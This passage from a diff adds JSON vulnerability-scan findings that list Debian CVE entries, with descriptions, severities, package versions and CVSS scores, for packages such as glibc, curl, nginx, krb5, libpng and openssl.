+  "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any
+  (called indirectly from cil_check_neverallow). This occurs because there is sometimes
+  a lack of checks for invalid statements in an optional block.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36087",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"},
+  {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36084", "description":
+  "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms
+  (called from __cil_verify_classpermission and __cil_pre_verify_helper).", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2021-36084", "severity": "LOW",
+  "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name",
+  "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2019-17498", "description":
+  "In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c
+  has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary
+  (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be
+  able to disclose sensitive information or cause a denial of service condition on
+  the client system when a user connects to the server.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17498",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"},
+  {"key": "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-17543", "description":
+  "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize),
+  affecting applications that call LZ4_compress_fast with a large input. (This issue
+  can also lead to data corruption.) NOTE: the vendor states \"only a few specific
+  / uncommon usages of the API are at risk.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17543",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.3-1+deb10u1"},
+  {"key": "package_name", "value": "lz4"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2013-0337", "description":
+  "The default configuration of nginx, possibly 1.3.13 and earlier, uses world-readable
+  permissions for the (1) access.log and (2) error.log files, which allows local users
+  to obtain sensitive information by reading the files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0337",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+  {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-7169", "description":
+  "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and
+  allows an unprivileged user to be placed in a user namespace where setgroups(2)
+  is permitted. This allows an attacker to remove themselves from a supplementary
+  group, which may allow access to certain filesystem paths if the administrator has
+  used \"group blacklisting\" (e.g., chmod g-rwx) to restrict access to paths. This
+  flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups
+  knob) to prevent this sort of privilege escalation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-7169",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"},
+  {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-37600", "description":
+  "An integer overflow in util-linux through 2.37.1 can potentially cause a buffer
+  overflow if an attacker were able to use system resources in a way that leads to
+  a large number in the /proc/sysvipc/sem file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-37600",
+  "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.33.1-0.1"},
+  {"key": "package_name", "value": "util-linux"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name":
+  "CVE-2011-3374", "description": "It was found that apt-key in apt, all versions,
+  do not correctly validate gpg keys with the master keyring, leading to a potential
+  man-in-the-middle attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3374",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.8.2.3"}, {"key": "package_name", "value": "apt"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name":
+  "CVE-2019-18276", "description": "An issue was discovered in disable_priv_mode in
+  shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective
+  UID not equal to its real UID, it will drop privileges by setting its effective
+  UID to its real UID. However, it does so incorrectly. On Linux and other systems
+  that support \"saved UID\" functionality, the saved UID is not dropped. An attacker
+  with command execution in the shell can use \"enable -f\" for runtime loading of
+  a new builtin, which can be a shared object that calls setuid() and therefore regains
+  privileges. However, binaries running with an effective UID of 0 are unaffected.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2019-18276", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "5.0-4"}, {"key":
+  "package_name", "value": "bash"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:C/I:C/A:C"},
+  {"key": "CVSS2_SCORE", "value": "7.2"}]}, {"name": "CVE-2017-18018", "description":
+  "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent
+  replacement of a plain file with a symlink during use of the POSIX \"-R -L\" options,
+  which allows local users to modify the ownership of arbitrary files by leveraging
+  a race condition.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-18018",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "8.30-3"}, {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "1.9"}]},
+  {"name": "CVE-2021-22923", "description": "When curl is instructed to get content
+  using the metalink feature, and a user name and password are used to download the
+  metalink XML file, those same credentials are then subsequently passed on to each
+  of the servers from which curl will download or try to download the contents from.
+  Often contrary to the user''s expectations and intentions and without telling the
+  user it happened.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22923",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-22922",
+  "description": "When curl is instructed to download content using the metalink feature,
+  thecontents is verified against a hash provided in the metalink XML file.The metalink
+  XML file points out to the client how to get the same contentfrom a set of different
+  URLs, potentially hosted by different servers and theclient can then download the
+  file from one or several of them. In a serial orparallel manner.If one of the servers
+  hosting the contents has been breached and the contentsof the specific file on that
+  server is replaced with a modified payload, curlshould detect this when the hash
+  of the file mismatches after a completeddownload. It should remove the contents
+  and instead try getting the contentsfrom another URL. This is not done, and instead
+  such a hash mismatch is onlymentioned in text and the potentially malicious content
+  is kept in the file ondisk.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22922",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2013-0340",
+  "description": "expat 2.1.0 and earlier does not properly handle entities expansion
+  unless an application developer uses the XML_SetEntityDeclHandler function, which
+  allows remote attackers to cause a denial of service (resource consumption), send
+  HTTP requests to intranet servers, or read arbitrary files via a crafted XML document,
+  aka an XML External Entity (XXE) issue.  NOTE: it could be argued that because expat
+  already provides the ability to disable external entity expansion, the responsibility
+  for resolving this issue lies with application developers; according to this argument,
+  this entry should be REJECTed, and each affected application would need its own
+  CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0340", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.2.6-2+deb10u1"},
+  {"key": "package_name", "value": "expat"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-1010023", "description":
+  "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library
+  with malicious ELF file. The impact is: In worst case attacker may evaluate privileges.
+  The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim
+  and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate \"this
+  is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010023",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name":
+  "CVE-2010-4051", "description": "The regcomp implementation in the GNU C Library
+  (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent
+  attackers to cause a denial of service (application crash) via a regular expression
+  containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation,
+  as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit
+  for ProFTPD, related to a \"RE_DUP_MAX overflow.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4051",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+  "CVE-2019-1010022", "description": "** DISPUTED ** GNU Libc current is affected
+  by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection.
+  The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability
+  and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments
+  indicate \"this is being treated as a non-security bug and no real threat.\"", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2019-1010022", "severity": "INFORMATIONAL",
+  "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+  "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2010-4052", "description":
+  "Stack consumption vulnerability in the regcomp implementation in the GNU C Library
+  (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent
+  attackers to cause a denial of service (resource exhaustion) via a regular expression
+  containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,}
+  sequence in the proftpd.gnu.c exploit for ProFTPD.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4052",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+  "CVE-2019-1010024", "description": "** DISPUTED ** GNU Libc current is affected
+  by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread
+  stack and heap. The component is: glibc. NOTE: Upstream comments indicate \"this
+  is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010024",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+  "CVE-2010-4756", "description": "The glob implementation in the GNU C Library (aka
+  glibc or libc6) allows remote authenticated users to cause a denial of service (CPU
+  and memory consumption) via crafted glob expressions that do not match any pathnames,
+  as demonstrated by glob expressions in STAT commands to an FTP daemon, a different
+  vulnerability than CVE-2010-2632.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4756",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name":
+  "CVE-2019-1010025", "description": "** DISPUTED ** GNU Libc current is affected
+  by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created
+  thread. The component is: glibc. NOTE: the vendor''s position is \"ASLR bypass itself
+  is not a vulnerability.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010025",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+  "CVE-2018-20796", "description": "In the GNU C Library (aka glibc or libc6) through
+  2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion,
+  as demonstrated by ''(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+'' in grep.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-20796",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+  "CVE-2019-9192", "description": "** DISPUTED ** In the GNU C Library (aka glibc
+  or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled
+  Recursion, as demonstrated by ''(|)(\\\\1\\\\1)*'' in grep, a different issue than
+  CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability
+  because the behavior occurs only with a crafted pattern.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9192",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+  "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+  "CVE-2011-3389", "description": "The SSL protocol, as used in certain configurations
+  in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome,
+  Opera, and other products, encrypts data by using CBC mode with chained initialization
+  vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers
+  via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction
+  with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection
+  API, or (3) the Silverlight WebClient API, aka a \"BEAST\" attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3389",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "3.6.7-4+deb10u7"}, {"key": "package_name", "value": "gnutls28"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+  {"name": "CVE-2021-30535", "description": "Double free in ICU in Google Chrome prior
+  to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption
+  via a crafted HTML page.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-30535",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "63.1-6+deb10u1"}, {"key": "package_name", "value": "icu"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]},
+  {"name": "CVE-2017-9937", "description": "In LibTIFF 4.0.8, there is a memory malloc
+  failure in tif_jbig.c. A crafted TIFF document can lead to an abort resulting in
+  a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9937",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.1-3.1"}, {"key": "package_name", "value": "jbigkit"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+  {"name": "CVE-2018-5709", "description": "An issue was discovered in MIT Kerberos
+  5 (aka krb5) through 1.16. There is a variable \"dbentry->n_key_data\" in kadmin/dbutil/dump.c
+  that can store 16-bit data but unknowingly the developer has assigned a \"u4\" variable
+  to it, which is for 32-bit data. An attacker can use this vulnerability to affect
+  other artifacts of the database as we know that a Kerberos database dump file contains
+  trusted data.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-5709",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+  {"name": "CVE-2021-36222", "description": "ec_verify in kdc/kdc_preauth_ec.c in
+  the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.4 and
+  1.19.x before 1.19.2 allows remote attackers to cause a NULL pointer dereference
+  and daemon crash. This occurs because a return value is not properly managed in
+  a certain situation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36222",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+  {"name": "CVE-2004-0971", "description": "The krb5-send-pr script in the kerberos5
+  (krb5) package in Trustix Secure Linux 1.5 through 2.1, and possibly other operating
+  systems, allows local users to overwrite files via a symlink attack on temporary
+  files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2004-0971", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"},
+  {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:P/A:N"},
+  {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2018-6829", "description":
+  "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly,
+  improperly encodes plaintexts, which allows attackers to obtain sensitive information
+  by reading ciphertext data (i.e., it does not have semantic security in face of
+  a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not
+  hold for Libgcrypt''s ElGamal implementation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-6829",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+  {"name": "CVE-2018-11813", "description": "libjpeg 9c has a large loop because read_pixel
+  in rdtarga.c mishandles EOF.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-11813",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "5"}]}, {"name": "CVE-2020-17541", "description": "Libjpeg-turbo all version have
+  a stack-based buffer overflow in the \"transform\" component. A remote attacker
+  can send a malformed jpeg file to the service and cause arbitrary code execution
+  or denial of service of the target service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-17541",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "6.8"}]}, {"name": "CVE-2017-15232", "description": "libjpeg-turbo 1.5.2 has a NULL
+  Pointer Dereference in jdpostct.c and jquant1.c via a crafted JPEG file.", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2017-15232", "severity": "INFORMATIONAL",
+  "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key":
+  "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-14048", "description":
+  "An issue has been found in libpng 1.6.34. It is a SEGV in the function png_free_data
+  in png.c, related to the recommended error handling for png_read_image.", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2018-14048", "severity": "INFORMATIONAL",
+  "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name",
+  "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-6129", "description":
+  "** DISPUTED ** png_create_info_struct in png.c in libpng 1.6.36 has a memory leak,
+  as demonstrated by pngcp. NOTE: a third party has stated \"I don''t think it is
+  libpng''s job to free this buffer.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-6129",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+  {"name": "CVE-2018-14550", "description": "An issue has been found in third-party
+  PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow
+  in the function get_token in pnm2png.c in pnm2png.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14550",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]},
+  {"name": "CVE-2019-9893", "description": "libseccomp before 2.4.0 did not correctly
+  generate 64-bit syscall argument comparisons using the arithmetic operators (LT,
+  GT, LE, GE), which might able to lead to bypassing seccomp filters and potential
+  privilege escalations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9893",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.3.3-4"}, {"key": "package_name", "value": "libseccomp"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]},
+  {"name": "CVE-2018-1000654", "description": "GNU Libtasn1-4.13 libtasn1-4.13 version
+  libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100%
+  when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree),
+  after a long time, the program will be killed. This attack appears to be exploitable
+  via parsing a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-1000654",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.13-3"}, {"key": "package_name", "value": "libtasn1-6"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.1"}]},
+  {"name": "CVE-2016-9085", "description": "Multiple integer overflows in libwebp
+  allows attackers to have unspecified impact via unknown vectors.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9085",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "0.6.1-2+deb10u1"}, {"key": "package_name", "value": "libwebp"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]},
+  {"name": "CVE-2015-9019", "description": "In libxslt 1.1.29 and earlier, the EXSLT
+  math.random function was not initialized with a random seed during startup, which
+  could cause usage of this function to produce predictable outputs.", "uri": "https://security-tracker.debian.org/tracker/CVE-2015-9019",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.1.32-2.2~deb10u1"}, {"key": "package_name", "value": "libxslt"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+  {"name": "CVE-2009-4487", "description": "nginx 0.7.64 writes data to a log file
+  without sanitizing non-printable characters, which might allow remote attackers
+  to modify a window''s title, or possibly execute arbitrary commands or overwrite
+  files, via an HTTP request containing an escape sequence for a terminal emulator.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2009-4487", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+  {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-15719", "description":
+  "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw
+  when the third-party package is asserting RFC6125 support. It considers CN even
+  when there is a non-matching subjectAltName (SAN). This is fixed in, for example,
+  openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-15719",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value":
+  "4"}]}, {"name": "CVE-2015-3276", "description": "The nss_parse_ciphers function
+  in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword
+  mode cipher strings, which might cause a weaker than intended cipher to be used
+  and allow remote attackers to have unspecified impact via unknown vectors.", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2015-3276", "severity": "INFORMATIONAL",
+  "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key":
+  "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2017-14159", "description":
+  "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges
+  to a non-root account, which might allow local users to kill arbitrary processes
+  by leveraging access to this non-root account for PID file modification before a
+  root script executes a \"kill `cat /pathname`\" command, as demonstrated by openldap-initscript.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2017-14159", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"},
+  {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2017-17740", "description":
+  "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops
+  module and the memberof overlay are enabled, attempts to free a buffer that was
+  allocated on the stack, which allows remote attackers to cause a denial of service
+  (slapd crash) via a member MODDN operation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17740",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "5"}]}, {"name": "CVE-2010-0928", "description": "OpenSSL 0.9.8i on the Gaisler
+  Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation
+  (FWE) algorithm for certain signature calculations, and does not verify the signature
+  before providing it to a caller, which makes it easier for physically proximate
+  attackers to determine the private key via a modified supply voltage for the microprocessor,
+  related to a \"fault-based attack.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-0928",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.1.1d-0+deb10u6"}, {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:H/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4"}]},
+  {"name": "CVE-2007-6755", "description": "The NIST SP 800-90A default statement
+  of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm
+  contains point Q constants with a possible relationship to certain \"skeleton key\"
+  values, which might allow context-dependent attackers to defeat cryptographic protection
+  mechanisms by leveraging knowledge of those values.  NOTE: this is a preliminary
+  CVE for Dual_EC_DRBG; future research may provide additional details about point
+  Q and associated attacks, and could potentially lead to a RECAST or REJECT of this
+  CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-6755", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.1d-0+deb10u6"},
